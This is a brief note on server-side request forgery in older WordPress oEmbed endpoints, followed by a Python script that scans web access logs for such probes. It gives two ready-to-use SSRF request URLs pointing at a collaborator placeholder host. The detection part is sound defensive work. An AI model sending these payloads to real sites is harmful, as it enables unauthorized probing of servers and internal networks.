WordPress SSRF
In old WordPress versions, an adversary could perform an SSRF at the following endpoints.
For example, you could receive an HTTP request triggered by one of the requests below.
Change example.com and <COLLABORATOR_HERE> accordingly:
- Embed:
https://example.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2F<COLLABORATOR_HERE>%2F
- Proxy:
https://example.com/wp-json/oembed/1.0/proxy?url=https%3A%2F%2F<COLLABORATOR_HERE>%2F
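
To check whether these endpoints are being probed on a site you run, the following added example (not part of the original note) scans web access logs for embed/proxy requests whose url parameter points away from the site itself. The combined log format, the SITE_HOSTS values and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hostnames that legitimately belong to the site being monitored.
SITE_HOSTS = {"example.com", "www.example.com"}
OEMBED_PATHS = {"/wp-json/oembed/1.0/embed", "/wp-json/oembed/1.0/proxy"}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines in combined log format, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-json/oembed/1.0/proxy?url=https%3A%2F%2Fcallback.test%2F HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2F192.0.2.10%2F HTTP/1.1" 200 90 "-" "curl/8.0"
198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexample.com%2Fhello-world%2F HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.2 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

def classify_target(url):
    """Return a reason if the url parameter points away from the site, else None."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return "unparseable target"
    try:
        ipaddress.ip_address(host)
        return "IP-literal host"
    except ValueError:
        pass
    return None if host in SITE_HOSTS else "off-site host"

def find_oembed_ssrf_probes(log_text):
    """Return (client, path, target_url, reason, status) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if parts.path.rstrip("/") not in OEMBED_PATHS:
            continue
        # parse_qs percent-decodes the value, so the encoded form above is handled.
        for url in parse_qs(parts.query).get("url", []):
            reason = classify_target(url)
            if reason:
                findings.append((client, parts.path, url, reason, int(status)))
    return findings

if __name__ == "__main__":
    for finding in find_oembed_ssrf_probes(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the endpoint was asked to fetch a foreign URL; correlate it with outbound connections from the web server to confirm the request was actually made.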